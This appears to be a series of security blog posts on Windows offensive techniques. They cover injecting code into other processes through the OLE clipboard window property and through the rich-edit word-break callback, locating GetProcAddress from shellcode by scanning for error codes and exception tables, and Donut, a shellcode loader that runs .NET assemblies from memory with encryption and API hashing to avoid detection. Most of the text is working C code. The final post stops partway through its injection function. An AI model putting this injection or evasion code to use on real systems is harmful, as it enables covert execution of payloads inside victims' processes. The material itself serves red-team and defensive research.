Windows Process Injection: CLIPBRDWNDCLASS

Introduction

The Object Linking & Embedding (OLE) library (ole32.dll) uses a private clipboard. It registers CLIPBRDWNDCLASS as a window class, creates a window derived from that class, and assigns a number of window properties to store the address of interfaces required to process clipboard data. Hexacorn describes here how one of the properties, ClipboardDataObjectInterface, can be leveraged for code injection. Two other properties, ClipboardRootDataObjectInterface and ClipboardDataObjectInterfaceMTA can also be used. If ClipboardDataObjectInterface is set to the address of an IUnknown interface and the clipboard window procedure receives a WM_DESTROYCLIPBOARD message, it will invoke the Release method.

Finding Windows

Private clipboards registered by OLE32.dll can’t be found by EnumWindows because they’re message-only windows. FindWindowEx with HWND_MESSAGE will find them and is used for the PoC. Another approach requires reading the ReservedForOle value of each Thread Environment Block in a process. ReservedForOle points to a SOleTlsData structure that contains a window handle for CLIPBRDWNDCLASS. To find private clipboards via the TEB, open a process and enumerate threads. Then perform the following steps:

  • Open the thread
  • Query the ThreadBasicInformation
  • Read tbi.TebBaseAddress
  • Read sizeof(SOleTlsData) from teb.ReservedForOle
  • Read hwndClip

Interface

Since only the Release method is called by the Window procedure that retrieves a pointer to the interface, the following structure is enough.

// fake interface
typedef struct _IUnknown_t {
    // a pointer to virtual function table
    ULONG_PTR lpVtbl;
    // the virtual function table
    ULONG_PTR QueryInterface;
    ULONG_PTR AddRef;
    ULONG_PTR Release;       // executed for WM_DESTROYCLIPBOARD
} IUnknown_t;

Injection

The following code assumes a valid clipboard window already exists. There is no error checking.

VOID clipboard(LPVOID payload, DWORD payloadSize) {
    HANDLE     hp;
    HWND       hw;
    DWORD      id;
    IUnknown_t iu;
    LPVOID     cs, ds;
    SIZE_T     wr;
    
    // 1. Find a private clipboard.
    //    Obtain the process id and open it
    hw = FindWindowEx(HWND_MESSAGE, NULL, L"CLIPBRDWNDCLASS", NULL);
    GetWindowThreadProcessId(hw, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 2. Allocate RWX memory in process and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 3. Allocate RW memory in process.
    //    Initialize and write IUnknown interface
    ds = VirtualAllocEx(hp, NULL, sizeof(IUnknown_t),
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    iu.lpVtbl  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
    iu.Release = (ULONG_PTR)cs;
    WriteProcessMemory(hp, ds, &iu, sizeof(IUnknown_t), &wr);
    
    // 4. Set the interface property and trigger execution
    SetProp(hw, L"ClipboardDataObjectInterface", ds);
    PostMessage(hw, WM_DESTROYCLIPBOARD, 0, 0);
    
    // 5. Release memory for code and data
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

This method is very similar to the PROPagate technique because it uses the SetProp API. However, this is easier to exploit because the window procedure removes the window property after receiving WM_DESTROYCLIPBOARD. PoC here.

Posted in malware, programming, security, shellcode, windows | Tagged , , , | Leave a comment

Shellcode: Using the Exception Directory to find GetProcAddress

Introduction

Let’s say you want the location of the GetProcAddress API in memory, but you can’t use the Import Address Table (IAT) or the Export Address Table (EAT). What other ways can you do it?. Perhaps there are many ways, but let me suggest one that’s relatively simple to implement and only involves searching for immediate values in the code section. When GetProcAddress or GetProcAddressForCaller cannot locate the address of a function in a dynamic library, they will return the error code STATUS_ORDINAL_NOT_FOUND. If we search in kernelbase.dll for this immediate value, we should land somewhere in the address range of these API. From there, we locate the entry point.

Method 1 (32-bit)

Search the code section (.text) of each Dynamic-link Library (DLL) for the immediate value 0xC0000138. If we find it, reverse the direction of search until we find the prolog bytes. For stdcall convention, prolog bytes normally begin with push ebp and mov ebp, esp. If the prolog contains mov edi, edi we can safely skip that because it’s only used for hot-patching systems after XP SP2. The following pseudo-code attempts to describe this idea.

  func GetGPA
    set addr = 0
    
    foreach (DLL in PEB) and addr is 0
      for pos = start(DLL.text) to end(DLL.text) - 4
        if pos[0] equal to STATUS_ORDINAL_NOT_FOUND
          while (pos[0] not equal to prolog (push ebp, mov ebp, esp)) 
            set pos = pos - 1
          set addr = pos
          break
        end if
        set pos = pos + 1
      end for
    end for
    
    set GetGPA = addr
  end func

The following code in C demonstrates the idea.

LPVOID GetGPA(VOID) {
    PPEB                  peb;
    PPEB_LDR_DATA         ldr;
    PLDR_DATA_TABLE_ENTRY dte;
    LPVOID                addr=NULL;
    BYTE                  c;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt; 
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, j, h;
    PBYTE                 cs;
    
    peb = (PPEB) __readfsdword(0x30);
    ldr = (PPEB_LDR_DATA)peb->Ldr;
    
    // for each DLL loaded
    for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL && addr == NULL; 
         dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
    { 
      // is this kernel32.dll or kernelbase.dll?
      for (h=i=0; i<dte->BaseDllName.Length/2; i++) {
        c = dte->BaseDllName.Buffer[i];
        h += (c | 0x20);
        h = ROTR32(h, 13);
      }
      if (h != 0x22901A8D) continue;
      
      dos = (PIMAGE_DOS_HEADER)dte->DllBase;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, dte->DllBase, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader); 
             
      for (i=0; i<nt->FileHeader.NumberOfSections && addr == NULL; i++) {
        if (sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
          cs = RVA2VA (PBYTE, dte->DllBase, sh[i].VirtualAddress);
          for(j=0; j<sh[i].Misc.VirtualSize - 4 && addr == NULL; j++) {
            // is this STATUS_ORDINAL_NOT_FOUND?
            if(*(DWORD*)&cs[j] == 0xC0000138) {
              while(--j) {
                // is this the prolog?
                if(cs[j  ] == 0x55 &&
                   cs[j+1] == 0x8B &&
                   cs[j+2] == 0xEC) {
                  addr = &cs[j];
                  break;
                }
              }
            }
          }
        }
      }
    }
    return addr;
}

This approach should work fine on 32-bit legacy systems, but not 64-bit systems.

Method 2 (64-bit)

The first method doesn’t work for x64 builds because of compiler optimizations and different calling convention. stdcall is replaced with Microsoft fastcall, and chunking can break up a function over a wider address range. For 64-bit, both problems can be solved parsing the Exception Directory (.pdata section), which is an array of IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the dispatcher will enumerate this array until it finds the primary function associated with the address of exception, and will use the unwind information to try fix up the stack. You can find more information about x64 exception handling here.

typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindInfoAddress;
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;

The following pseudo-code attempts to describe the idea..

  func GetGPA
    set addr = 0
    
    foreach (DLL in PEB) and addr is 0
      foreach runtime in DLL.DataDirectory[Exception] and addr is 0
        set baddr = runtime.BeginAddress
        set start = runtime.BeginAddress + DLL.DllBase
        set end   = runtime.EndAddress   + DLL.DllBase
        for start to end and addr is 0
          if start[0] == near conditional jump
            set rva = (*(DWORD*)(start + 2) + 6 + start) - DLL.DllBase
            foreach runtime in DLL.DataDirectory[Exception] and addr is 0
              if rva == runtime.BeginAddress
                set start2 = runtime.BeginAddress + DLL.DllBase
                set end2   = runtime.EndAddress   + DLL.DllBase
                for start2 to end2
                  if start2[0] == STATUS_ORDINAL_NOT_FOUND
                    addr = baddr + DLL.DllBase
                    break
                  end if
                end for
              end if
            end foreach
          end if
        end for
      end foreach
    end foreach
    
    set GetGPA = addr
  end func

The following code has been tested on 64-bit builds of Windows 7 and Windows 10. GetGPA returned the address of GetProcAddress in both tests.

LPVOID GetGPA(VOID) {
    PPEB                          peb;
    PPEB_LDR_DATA                 ldr;
    PLDR_DATA_TABLE_ENTRY         dte;
    LPVOID                        addr=NULL;
    BYTE                          c;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, j, h, rva, ba;
    PBYTE                         s1, e1, s2, e2;
    PUNWIND_INFO                  ui;
    
    peb = (PPEB) __readgsqword(0x60);
    ldr = (PPEB_LDR_DATA)peb->Ldr;
    
    for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL && addr == NULL; 
         dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
    { 
      // is this kernelbase.dll?
      for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
        c = (BYTE)dte->BaseDllName.Buffer[i];
        h += (c | 0x20);
        h = ROTR32(h, 13);
      }
      // if not, skip it
      if (h != 0x22901A8D) continue;
      
      dos = (PIMAGE_DOS_HEADER)dte->DllBase;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, dte->DllBase, dos->e_lfanew);  
      dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
      rf  = (PIMAGE_RUNTIME_FUNCTION_ENTRY) RVA2VA(ULONG_PTR, dte->DllBase, rva);
      
      // foreach runtime function and address not found
      for(i=0; rf[i].BeginAddress != 0 && addr == NULL; i++) {
        ba = rf[i].BeginAddress;
        // we will search the code between BeginAddress and EndAddress
        s1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].BeginAddress);
        e1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].EndAddress);
        
        // if chained unwind information is specified in the next entry
        ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i+1].UnwindData);
        
        if(ui->Flags & UNW_FLAG_CHAININFO) {
          // find the last entry in the chain
          for(;;) {
            i++;
            e1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].EndAddress);
            ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].UnwindData);
            if(!(ui->Flags & UNW_FLAG_CHAININFO)) break;
          }
        }
        // for this address range minus the length of a near conditional jump
        while(s1 < (e1 - 6)) {
          // is the next instruction a near conditional jump?
          if(s1[0] == 0x0F && s1[1] >= 0x80 && s1[1] <= 0x8F) {
            // calculate the relative virtual address of jump
            rva = (DWORD)(((*(DWORD*)(s1 + 2)) + 6 + s1) - (PBYTE)dte->DllBase);
            // try find the rva in exception list
            for(j=0; rf[j].BeginAddress != 0 && addr == NULL; j++) {
              if(rf[j].BeginAddress == rva) {               
                s2 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[j].BeginAddress);
                e2 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[j].EndAddress);
                // try find the error code in this address range
                while(s2 < (e2 - 4)) {
                  // if this is STATUS_ORDINAL_NOT_FOUND
                  if(*(DWORD*)s2 == 0xC0000138) {
                    // calculate the virtual address of primary function
                    addr = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, ba);
                    break;
                  }
                  s2++;
                }
              }
            }
          }
          s1++;
        }
      }
    }
    return addr;
}

Sources here.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments

Shellcode: Loading .NET Assemblies From Memory

Introduction

The dot net Framework can be found on almost every device running Microsoft Windows. It is popular among professionals involved in both attacking (Red Team) and defending (Blue Team) a Windows-based device. In 2015, the Antimalware Scan Interface (AMSI) was integrated with various Windows components used to execute scripts (VBScript, JScript, PowerShell). Around the same time, enhanced logging or Script Block Logging was added to PowerShell that allows capturing the full contents of scripts being executed, thereby defeating any obfuscation used. To remain ahead of blue teams, red teams had to go another layer deeper into the dot net framework by using assemblies. Typically written in C#, assemblies provide red teams with all the functionality of PowerShell, but with the distinct advantage of loading and executing entirely from memory. In this post, I will briefly discuss a tool called Donut, that when given a .NET assembly, class name, method, and optional parameters, will generate a position-independent code (PIC) or shellcode that can load a .NET assembly from memory. The project was a collaborative effort between myself and TheWover who has blogged about donut here.

Common Language Runtime (CLR) Hosting Interfaces

The CLR is the virtual machine component while the ICorRuntimeHost interface available since v1.0 of the framework (released in 2002) facilitates hosting .NET assemblies. This interface was superseded by ICLRRuntimeHost when v2.0 of the framework was released in 2006, and this was superseded by ICLRMetaHost when v4.0 of the framework was released in 2009. Although deprecated, ICorRuntimeHost currently provides the easiest way to load assemblies from memory. There are a variety of ways to instantiate this interface, but the most popular appears to be through one of the following:

CorBindToRuntime and CorBindToRuntimeEx functions perform the same operation, but the CorBindToRuntimeEx function allows us to specify the behavior of the CLR. CLRCreateInstance avoids having to initialize Component Object Model (COM) but is not implemented prior to v4.0 of the framework. The following code in C++ demonstrates running a dot net assembly from memory.

#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>

#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>

#import "mscorlib.tlb" raw_interfaces_only

void rundotnet(void *code, size_t len) {
    HRESULT                  hr;
    ICorRuntimeHost          *icrh;
    IUnknownPtr              iu;
    mscorlib::_AppDomainPtr  ad;
    mscorlib::_AssemblyPtr   as;
    mscorlib::_MethodInfoPtr mi;
    VARIANT                  v1, v2;
    SAFEARRAY                *sa;
    SAFEARRAYBOUND           sab;
    
    printf("CoCreateInstance(ICorRuntimeHost).\n");
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    
    hr = CoCreateInstance(
      CLSID_CorRuntimeHost, 
      NULL, 
      CLSCTX_ALL,
      IID_ICorRuntimeHost, 
      (LPVOID*)&icrh);
      
    if(FAILED(hr)) return;
    
    printf("ICorRuntimeHost::Start()\n");
    hr = icrh->Start();
    if(SUCCEEDED(hr)) {
      printf("ICorRuntimeHost::GetDefaultDomain()\n");
      hr = icrh->GetDefaultDomain(&iu);
      if(SUCCEEDED(hr)) {
        printf("IUnknown::QueryInterface()\n");
        hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
        if(SUCCEEDED(hr)) {
          sab.lLbound   = 0;
          sab.cElements = len;
          printf("SafeArrayCreate()\n");
          sa = SafeArrayCreate(VT_UI1, 1, &sab);
          if(sa != NULL) {
            CopyMemory(sa->pvData, code, len);
            printf("AppDomain::Load_3()\n");
            hr = ad->Load_3(sa, &as);
            if(SUCCEEDED(hr)) {
              printf("Assembly::get_EntryPoint()\n");
              hr = as->get_EntryPoint(&mi);
              if(SUCCEEDED(hr)) {
                v1.vt    = VT_NULL;
                v1.plVal = NULL;
                printf("MethodInfo::Invoke_3()\n");
                hr = mi->Invoke_3(v1, NULL, &v2);
                mi->Release();
              }
              as->Release();
            }
            SafeArrayDestroy(sa);
          }
          ad->Release();
        }
        iu->Release();
      }
      icrh->Stop();
    }
    icrh->Release();
}

int main(int argc, char *argv[])
{
    void *mem;
    struct stat fs;
    FILE *fd;
    
    if(argc != 2) {
      printf("usage: rundotnet <.NET assembly>\n");
      return 0;
    }
    
    // 1. get the size of file
    stat(argv[1], &fs);
    
    if(fs.st_size == 0) {
      printf("file is empty.\n");
      return 0;
    }
    
    // 2. try open assembly
    fd = fopen(argv[1], "rb");
    if(fd == NULL) {
      printf("unable to open \"%s\".\n", argv[1]);
      return 0;
    }
    // 3. allocate memory 
    mem = malloc(fs.st_size);
    if(mem != NULL) {
      // 4. read file into memory
      fread(mem, 1, fs.st_size, fd);
      // 5. run the program from memory
      rundotnet(mem, fs.st_size);
      // 6. free memory
      free(mem);
    }
    // 7. close assembly
    fclose(fd);
    
    return 0;
}

The following is a simple Hello, World! example in C# that when compiled with csc.exe will generate a dot net assembly for testing the loader.

// A Hello World! program in C#.
using System;
namespace HelloWorld
{
    class Hello 
    {
        static void Main() 
        {
            Console.WriteLine("Hello World!");
        }
    }
}

Compiling and running both of these sources gives the following results.

That’s a basic implementation of executing dot net assemblies and doesn’t take into consideration what runtime versions of the framework are supported. The shellcode works differently by resolving the address of CorBindToRuntime and CLRCreateInstance together which is similar to AssemblyLoader by subTee. If CLRCreateInstance is successfully resolved and invocation returns E_NOTIMPL or “Not implemented”, we execute CorBindToRuntime with the pwszVersion parameter set to NULL, which simply requests the latest version available. If we request a specific version from CorBindToRuntime that is not supported by the system, a host process running the shellcode might display an error message. For example, the following screenshot shows a request for v4.0.30319 on a Windows 7 machine that only supports v3.5.30729.5420.

You may be asking why the OLE functions used in the hosting example are not also used in the shellcode. OLE functions are sometimes referenced in another DLL like COMBASE instead of OLE32. xGetProcAddress can handle forward references, but for now at least, the shellcode uses a combination of CorBindToRuntime and CLRCreateInstance. CoCreateInstance may be used in newer versions.

Defining .NET Types

Types are accessible from an unmanaged C++ application using the #import directive. The hosting example uses _AppDomain, _Assembly and _MethodInfo interfaces defined in mscorlib.tlb. The problem, however, is that there’s no definition of the interfaces anywhere in the public version of the Windows SDK. To use a dot net type from lower-level languages like assembly or C, we first have to manually define them. The type information can be enumerated using the LoadTypeLib API which returns a pointer to the ITypeLib interface. This interface will retrieve information about the library while ITypeInfo will retrieve information about the library interfaces, methods and variables. I found the open source application Olewoo useful for examining mscorlib.tlb. If we ignore all the concepts of Object Oriented Programming (OOP) like class, object, inheritance, encapsulation, abstraction, polymorphism..etc, an interface can be viewed from a lower-level as nothing more than a pointer to a data structure containing pointers to functions/methods. I could not find any definition of the required interfaces online except for one file in phplib that partially defines the _AppDomain interface. Based on that example, I created the other interfaces necessary for loading assemblies. The following method is a member of the _AppDomain interface.

        HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
          IType        *This,
          BSTR         name,
          BindingFlags invokeAttr,
          IBinder      *Binder,
          VARIANT      Target,
          SAFEARRAY    *args,
          VARIANT      *pRetVal);

Although no methods of the IBinder interface are used in the shellcode and the type could safely be changed to void *, the following is defined for future reference. The DUMMY_METHOD macro simply defines a function pointer.

    typedef struct _Binder IBinder;

    #undef DUMMY_METHOD
    #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
    
    typedef struct _BinderVtbl {
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
          IBinder * This,
          /* [in] */ REFIID riid,
          /* [iid_is][out] */ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
          IBinder * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
          IBinder * This);
          
        DUMMY_METHOD(GetTypeInfoCount);
        DUMMY_METHOD(GetTypeInfo);
        DUMMY_METHOD(GetIDsOfNames);
        DUMMY_METHOD(Invoke);
        DUMMY_METHOD(ToString);
        DUMMY_METHOD(Equals);
        DUMMY_METHOD(GetHashCode);
        DUMMY_METHOD(GetType);
        DUMMY_METHOD(BindToMethod);
        DUMMY_METHOD(BindToField);
        DUMMY_METHOD(SelectMethod);
        DUMMY_METHOD(SelectProperty);
        DUMMY_METHOD(ChangeType);
        DUMMY_METHOD(ReorderArgumentArray);
    } BinderVtbl;
    
    typedef struct _Binder {
      BinderVtbl *lpVtbl;
    } Binder;

Methods required to load assemblies from memory are defined in payload.h.

Donut Instance

The shellcode will always be combined with a block of data referred to as an Instance. This can be considered the “data segment” of the shellcode. It contains the names of DLL to load before attempting to resolve API, 64-bit hashes of API strings, COM GUIDs relevant for loading .NET assemblies into memory and decryption keys for both the Instance, and the Module if one is stored on a staging server. Many shellcodes written in C tend to store strings on the stack, but tools like FireEye Labs Obfuscated String Solver can recover them with relative ease, helping to analyze the code much faster. One advantage of keeping strings in a separate data block is when it comes to the permutation of the code. It’s possible to change the code while retaining the functionality, but never having to work with “read-only” immediate values that would complicate the process and significantly increase the size of the code. The following structure represents what is placed after a call opcode and before a pop ecx / pop rcx. The fastcall convention is used for both x86 and x86-64 shellcodes and this makes it convenient to load a pointer to the Instance in ecx or rcx register.

typedef struct _DONUT_INSTANCE {
    uint32_t    len;                          // total size of instance
    DONUT_CRYPT key;                          // decrypts instance
    // everything from here is encrypted
    
    int         dll_cnt;                      // the number of DLL to load before resolving API
    char        dll_name[DONUT_MAX_DLL][32];  // a list of DLL strings to load
    uint64_t    iv;                           // the 64-bit initial value for maru hash
    int         api_cnt;                      // the 64-bit hashes of API required for instance to work

    union {
      uint64_t  hash[48];                     // holds up to 48 api hashes
      void     *addr[48];                     // holds up to 48 api addresses
      // include prototypes only if header included from payload.h
      #ifdef PAYLOAD_H
      struct {
        // imports from kernel32.dll
        LoadLibraryA_t             LoadLibraryA;
        GetProcAddress_t           GetProcAddress;
        VirtualAlloc_t             VirtualAlloc;             
        VirtualFree_t              VirtualFree;  
        
        // imports from oleaut32.dll
        SafeArrayCreate_t          SafeArrayCreate;          
        SafeArrayCreateVector_t    SafeArrayCreateVector;    
        SafeArrayPutElement_t      SafeArrayPutElement;      
        SafeArrayDestroy_t         SafeArrayDestroy;         
        SysAllocString_t           SysAllocString;           
        SysFreeString_t            SysFreeString;            
        
        // imports from wininet.dll
        InternetCrackUrl_t         InternetCrackUrl;         
        InternetOpen_t             InternetOpen;             
        InternetConnect_t          InternetConnect;          
        InternetSetOption_t        InternetSetOption;        
        InternetReadFile_t         InternetReadFile;         
        InternetCloseHandle_t      InternetCloseHandle;      
        HttpOpenRequest_t          HttpOpenRequest;          
        HttpSendRequest_t          HttpSendRequest;          
        HttpQueryInfo_t            HttpQueryInfo;
        
        // imports from mscoree.dll
        CorBindToRuntime_t         CorBindToRuntime;
        CLRCreateInstance_t        CLRCreateInstance;
      };
      #endif
    } api;
    
    // GUID required to load .NET assembly
    GUID xCLSID_CLRMetaHost;
    GUID xIID_ICLRMetaHost;  
    GUID xIID_ICLRRuntimeInfo;
    GUID xCLSID_CorRuntimeHost;
    GUID xIID_ICorRuntimeHost;
    GUID xIID_AppDomain;
    
    DONUT_INSTANCE_TYPE type;  // PIC or URL 
    
    struct {
      char url[DONUT_MAX_URL];
      char req[16];            // just a buffer for "GET"
    } http;

    uint8_t     sig[DONUT_MAX_NAME];          // string to hash
    uint64_t    mac;                          // to verify decryption ok
    
    DONUT_CRYPT mod_key;       // used to decrypt module
    uint64_t    mod_len;       // total size of module
    
    union {
      PDONUT_MODULE p;         // for URL
      DONUT_MODULE  x;         // for PIC
    } module;
} DONUT_INSTANCE, *PDONUT_INSTANCE;

Donut Module

A dot net assembly is stored in a data structure referred to as a Module. It can be stored with an Instance or on a staging server that the shellcode will retrieve it from. Inside the module will be the assembly, class name, method, and optional parameters. The sig value will contain a random 8-byte string that when processed with the Maru hash function will generate a 64-bit value that should equal the value of mac. This is to verify decryption of the module was successful. The Module key is stored in the Instance embedded with the shellcode.

// everything required for a module goes into the following structure
typedef struct _DONUT_MODULE {
    DWORD   type;                                   // EXE or DLL
    WCHAR   runtime[DONUT_MAX_NAME];                // runtime version
    WCHAR   domain[DONUT_MAX_NAME];                 // domain name to use
    WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace
    WCHAR   method[DONUT_MAX_NAME];                 // name of method to invoke
    DWORD   param_cnt;                              // number of parameters to method
    WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters passed to method
    CHAR    sig[DONUT_MAX_NAME];                    // random string to verify decryption
    ULONG64 mac;                                    // to verify decryption ok
    DWORD   len;                                    // size of .NET assembly
    BYTE    data[4];                                // .NET assembly file
} DONUT_MODULE, *PDONUT_MODULE;

Random Keys

On Windows, CryptGenRandom generates cryptographically secure random values while on Linux, /dev/urandom is used instead of /dev/random because the latter blocks on read attempts. Thomas Huhn writes in Myths about /dev/urandom that /dev/urandom is the preferred source of cryptographic randomness on Linux. Now, I don’t suggest any of you reuse CreateRandom to generate random keys, but that’s how they’re generated in Donut.

Random Strings

Application Domain names are generated using a random string unless specified by the user generating a payload. If a donut module is stored on a staging server, a random name is generated for that too. The function that handles this is aptly named GenRandomString. Using random bytes from CreateRandom, a string is derived from the letters “HMN34P67R9TWCXYF”. The selection of these letters is based on a post by trepidacious about unambiguous characters.

Symmetric Encryption

An involution is simply a function that is its own inverse and many tools use involutions to obfuscate the code. If you’ve ever reverse engineered malware, you will no doubt be familiar with the eXclusive-OR operation that is used quite a lot because of its simplicity. A more complicated example of involutions can be the non-linear operation used for the Noekeon block cipher. Instead of involutions, Donut uses the Chaskey block cipher in Counter (CTR) mode to encrypt the module with the decryption key embedded in the shellcode. If a Donut module is recovered from a staging server, the only way to get information about what’s inside it is to recover the shellcode, find a weakness with the CreateRandom function or break the Chaskey cipher.

static void chaskey(void *mk, void *p) {
    uint32_t i,*w=p,*k=mk;

    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
    
    // apply 16 rounds of permutation
    for(i=0;i<16;i++) {
      w[0] += w[1],
      w[1]  = ROTR32(w[1], 27) ^ w[0],
      w[2] += w[3],
      w[3]  = ROTR32(w[3], 24) ^ w[2],
      w[2] += w[1],
      w[0]  = ROTR32(w[0], 16) + w[3],
      w[3]  = ROTR32(w[3], 19) ^ w[0],
      w[1]  = ROTR32(w[1], 25) ^ w[2],
      w[2]  = ROTR32(w[2], 16);
    }
    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
}

Chaskey was selected because it’s compact, simple to implement and doesn’t contain constants that would be useful in generating simple detection signatures. The main downside is that Chaskey is relatively unknown and therefore hasn’t received as much cryptanalysis as AES has. When Chaskey was first published in 2014, the recommended number of rounds was 8. In 2015, an attack against 7 of the 8 rounds was discovered showing that the number of rounds was too low of a security margin. In response to this attack, the designers proposed 12 rounds, but Donut uses the Long-term Support (LTS) version with 16 rounds.

API Hashing

If the hash of an API string is well known in advance of a memory scan, detecting Donut would be much easier. It was suggested in Windows API hashing with block ciphers that introducing entropy into the hashing process would help code evade detection for longer. Donut uses the Maru hash function which is built atop of the Speck block cipher. It uses a Davies-Meyer construction and padding similar to what’s used in MD4 and MD5. A 64-bit Initial Value (IV) is generated randomly and used as the plaintext to encrypt while the API string is used as the key.

static uint64_t speck(void *mk, uint64_t p) {
    uint32_t k[4], i, t;
    union {
      uint32_t w[2];
      uint64_t q;
    } x;
    
    // copy 64-bit plaintext to local buffer
    x.q = p;
    
    // copy 128-bit master key to local buffer
    for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];
    
    for(i=0;i<27;i++) {
      // donut_encrypt 64-bit plaintext
      x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
      x.w[1] =  ROTR32(x.w[1],29) ^ x.w[0];
      
      // create next 32-bit subkey
      t = k[3];
      k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
      k[0] =  ROTR32(k[0],29) ^ k[3];
      k[1] = k[2]; k[2] = t;
    }
    // return 64-bit ciphertext
    return x.q;
}

Summary

Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully, that is correct. Source code can be found here.

Posted in assembly, encryption, malware, programming, security, shellcode, windows | Tagged , , , , , , | Leave a comment

Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline

Introduction

This is a quick response to a number of posts related to code/process injection by @hexacorn over the last week. He suggests seven new (one not so new) ways to use “shatter” style attacks for code injection/redirection. I’ll briefly discuss all of these and provide a few working examples. The first five examples work with Edit and Rich Edit controls. The last two work with SysListView32 and SysTreeView32.

  1. WordWarping
  2. Hyphentension
  3. AutoCourgette
  4. Streamception
  5. Oleum
  6. ListPlanting
  7. Treepoline

Rich Edit controls

To find these, you have the option of enumerating all windows with something like EnumWindows, retrieving the class name from window handle and then comparing the start of the string with “RICHEDIT”. You can also find these controls manually with FindWindow/FindWindowEx. I’m working with an evaluation copy of Windows 10, so the only application I tested was Wordpad and finding the Rich Edit Control for that only required two lines of code.

    // 1. Get main window for wordpad.
    wpw = FindWindow(L"WordPadClass", NULL);
    
    // 2. Find the rich edit control.
    rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);

WordWarping

A word wrapper callback function for an edit or rich edit control can be set using the EM_SETWORDBREAKPROC message. Simulating keyboard input via the SendInput or PostMessage APIs can trigger execution of the callback function. This method of injection was used to elevate privileges against a number of applications sixteen years ago. Although no CVE exist, it was used to exploit McAfee VirusScan, Sygate Personal Firewall Pro, WinVNC, Dameware and possibly others. The following code uses WordPad to inject code.

VOID wordwarping(LPVOID payload, DWORD payloadSize) {
    HANDLE        hp;
    DWORD         id;
    HWND          wpw, rew;
    LPVOID        cs, wwf;
    SIZE_T        rd, wr;
    INPUT         ip;
    
    // 1. Get main window for wordpad.
    //    This will accept simulated keyboard input.
    wpw = FindWindow(L"WordPadClass", NULL);
    
    // 2. Find the rich edit control for wordpad.
    rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);

    // 3. Try get current address of Wordwrap function
    wwf = (LPVOID)SendMessage(rew, EM_GETWORDBREAKPROC, 0, 0);

    // 4. Obtain the process id for wordpad.
    GetWindowThreadProcessId(rew, &id);

    // 5. Try open the process.
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 6. Allocate RWX memory for the payload.
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // 7. Write the payload to memory
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);

    // 8. Update the callback procedure
